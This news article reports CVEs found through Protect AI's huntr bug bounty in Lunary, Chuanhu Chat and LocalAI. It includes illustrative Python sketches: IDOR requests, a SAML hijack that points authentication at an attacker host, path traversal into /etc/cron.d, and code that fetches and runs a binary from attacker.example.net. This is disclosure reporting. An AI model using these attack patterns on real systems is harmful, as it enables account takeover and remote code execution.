AI bug bounty program yields 34 flaws in open-source tools

Nearly three dozen flaws in open-source AI and machine learning (ML) tools were disclosed Tuesday as part of Protect AI’s huntr bug bounty program.

The discoveries include three critical vulnerabilities: two in the Lunary AI developer toolkit and one in a graphical user interface (GUI) for ChatGPT called Chuanhu Chat. The October vulnerability report also includes 18 high-severity flaws ranging from denial-of-service (DoS) to remote code execution (RCE).

“Through our own research and the huntr community, we’ve found the tools used in the supply chain to build the machine learning models that power AI applications to be vulnerable to unique security threats,” stated Protect AI security researchers Dan McInerney and Marcello Salvati. “These tools are open source and downloaded thousands of times a month to build enterprise AI systems.”

Protect AI’s report also highlights vulnerabilities in LocalAI, a platform for running AI models locally on consumer-grade hardware; LoLLMs, a web UI for various AI systems; LangChain.js, a framework for developing language model applications; and more.

Lunary AI flaws risk manipulation of authentication, external users

Two of the most severe vulnerabilities disclosed Tuesday through the huntr program are flaws in the Lunary AI production toolkit for developers of large language model (LLM) chatbots. The open-source toolkit is used by “2500+ AI developers at top companies,” according to the Lunary AI website.

The flaws are tracked as CVE-2024-7474 and CVE-2024-7475, and both have a CVSS score of 9.1.

CVE-2024-7474 is an insecure direct object reference (IDOR) flaw that could allow an authenticated user to view or delete the user records of any other external user, due to a lack of proper access control checks on the relevant API endpoints. An attacker who knows another user’s user ID can substitute it for their own when calling these endpoints, enabling them to view and delete the victim’s records as though they were their own.
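
The attack shape is simple; the sketch below illustrates the general IDOR pattern with a hypothetical host, endpoint path and token, not Lunary’s actual API.

import requests

# Hypothetical illustration of the IDOR request pattern: an authenticated
# attacker substitutes a victim's user ID into endpoints that never check
# whether the caller owns the record. Host, path and token are placeholders.
BASE_URL = "https://lunary.example.com/api"
ATTACKER_TOKEN = "attacker-session-token"   # attacker's own valid session
VICTIM_USER_ID = "1042"                     # victim's ID, guessed or leaked

headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}

# View another user's record by swapping in their ID
resp = requests.get(f"{BASE_URL}/users/{VICTIM_USER_ID}", headers=headers)
print(resp.status_code, resp.text)

# Deletion works the same way when the access check is missing
resp = requests.delete(f"{BASE_URL}/users/{VICTIM_USER_ID}", headers=headers)
print(resp.status_code)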

CVE-2024-7475 is also due to improper access control, this time on requests to the Security Assertion Markup Language (SAML) configuration endpoint. The flaw enables attackers to use crafted POST requests to maliciously update the SAML configuration, which can lead to manipulation of authentication processes and potentially fraudulent logins.
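
A rough sketch of that attack shape follows; the endpoint path and configuration fields are illustrative assumptions, not Lunary’s real SAML schema.

import requests

# Hypothetical sketch of the CVE-2024-7475 attack shape: a crafted POST that
# overwrites the SAML identity-provider settings. Endpoint and field names
# are placeholders.
BASE_URL = "https://lunary.example.com/api"
ATTACKER_TOKEN = "attacker-session-token"

malicious_saml_config = {
    # Points authentication at an attacker-controlled identity provider,
    # enabling fraudulent logins once users authenticate through it
    "idp_metadata_url": "https://attacker.example.net/idp/metadata.xml",
    "sso_enabled": True,
}

resp = requests.post(
    f"{BASE_URL}/saml/config",
    json=malicious_saml_config,
    headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"},
)
print(resp.status_code)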

Both flaws were addressed by Lunary and can be fixed by upgrading to Lunary version 1.3.4.

Chuanhu Chat, LocalAI flaws could lead to RCE, data leakage

An additional critical flaw disclosed in Protect AI’s report Tuesday is a path traversal vulnerability in the user upload feature of Chuanhu Chat, which could enable RCE, arbitrary directory creation and leakage of information from CSV files due to improper sanitization of certain inputs. The flaw is tracked as CVE-2024-5982 and has a CVSS score of 9.1.

CVE-2024-5982 can be exploited to achieve RCE by creating a user with a name that includes an absolute path and then uploading a file with a cron job configuration through the Chuanhu Chat interface. Additional modified user requests can also be used to create arbitrary directories through the “get_history_names” function and leak the first columns of CSV files through the “load_template” function, Protect AI reports.
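
The root cause is a familiar one. The minimal example below, a generic illustration rather than Chuanhu Chat’s actual code, shows how joining an unsanitized username containing an absolute path into an upload path escapes the intended directory, which is how an uploaded cron job file could land somewhere it gets executed.

import os

# Generic illustration of the underlying path traversal (not Chuanhu Chat's
# actual code): joining an unsanitized username into a filesystem path lets
# an absolute path escape the intended upload directory.
UPLOAD_ROOT = "/srv/app/uploads"

def upload_path(username: str, filename: str) -> str:
    # Vulnerable: os.path.join discards UPLOAD_ROOT when username is absolute
    return os.path.join(UPLOAD_ROOT, username, filename)

print(upload_path("alice", "notes.txt"))
# -> /srv/app/uploads/alice/notes.txt (expected)

print(upload_path("/etc/cron.d", "evil_job"))
# -> /etc/cron.d/evil_job (attacker-controlled file lands in a cron directory)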

The Chuanhu Chat project has more than 15,200 stars and 2,300 forks on GitHub. CVE-2024-5982 was fixed in Chuanhu Chat version 20240918.

LocalAI is another popular open-source AI project on GitHub with more than 24,000 stars and 1,900 forks. The huntr community discovered multiple vulnerabilities in the platform, including an RCE flaw tracked as CVE-2024-6983 and a timing attack vulnerability tracked as CVE-2024-7010.

CVE-2024-6983, which has a CVSS score of 8.8, enables an attacker to upload a malicious configuration file with a uniform resource identifier (URI) that points to a malicious binary hosted on an attacker-controlled server. The binary is then executed when the configuration file is processed on the target system.
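
A minimal sketch of that vulnerable pattern, assuming nothing about LocalAI’s actual implementation beyond the behavior described above: a URI in a user-supplied configuration is fetched and the result is executed without verification.

import os
import subprocess
import tempfile
import urllib.request

# Illustrative sketch of the vulnerable pattern described for CVE-2024-6983,
# not LocalAI's actual implementation: a configuration file supplies a URI,
# the server fetches whatever it points to, and the downloaded artifact is
# executed without verifying its origin or contents.
config = {
    "name": "innocuous-model",
    "backend_uri": "https://attacker.example.net/payload.bin",  # attacker-controlled
}

def process_config(cfg: dict) -> None:
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        # The URI is trusted blindly, so the attacker's binary is downloaded
        tmp.write(urllib.request.urlopen(cfg["backend_uri"]).read())
        path = tmp.name
    os.chmod(path, 0o755)
    subprocess.run([path])  # executing the fetched file completes the RCE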

CVE-2024-7010, CVSS score 7.5, can enable a timing attack, which is a type of side-channel attack that measures the response time of a server when processing an API key. If an attacker were to set up a script that sends multiple API key guesses to the server and records the response times for each key, they could eventually predict the correct key to gain unauthorized access.
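
The sketch below shows why such a comparison leaks timing information and how a constant-time comparison removes the signal; the function names are illustrative, not LocalAI’s code.

import hmac

# Why response time leaks the key: a naive comparison exits at the first
# mismatching character, so guesses that share a longer correct prefix take
# measurably longer to reject.
def check_key_vulnerable(guess: str, real_key: str) -> bool:
    if len(guess) != len(real_key):
        return False
    for a, b in zip(guess, real_key):
        if a != b:
            return False  # early exit leaks how much of the prefix matched
    return True

# Mitigation: compare in constant time so every guess takes the same work.
def check_key_safe(guess: str, real_key: str) -> bool:
    return hmac.compare_digest(guess.encode(), real_key.encode())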

CVE-2024-6983 can be patched by upgrading to LocalAI version 2.19.4, while fixing CVE-2024-7010 requires an upgrade to version 2.21.
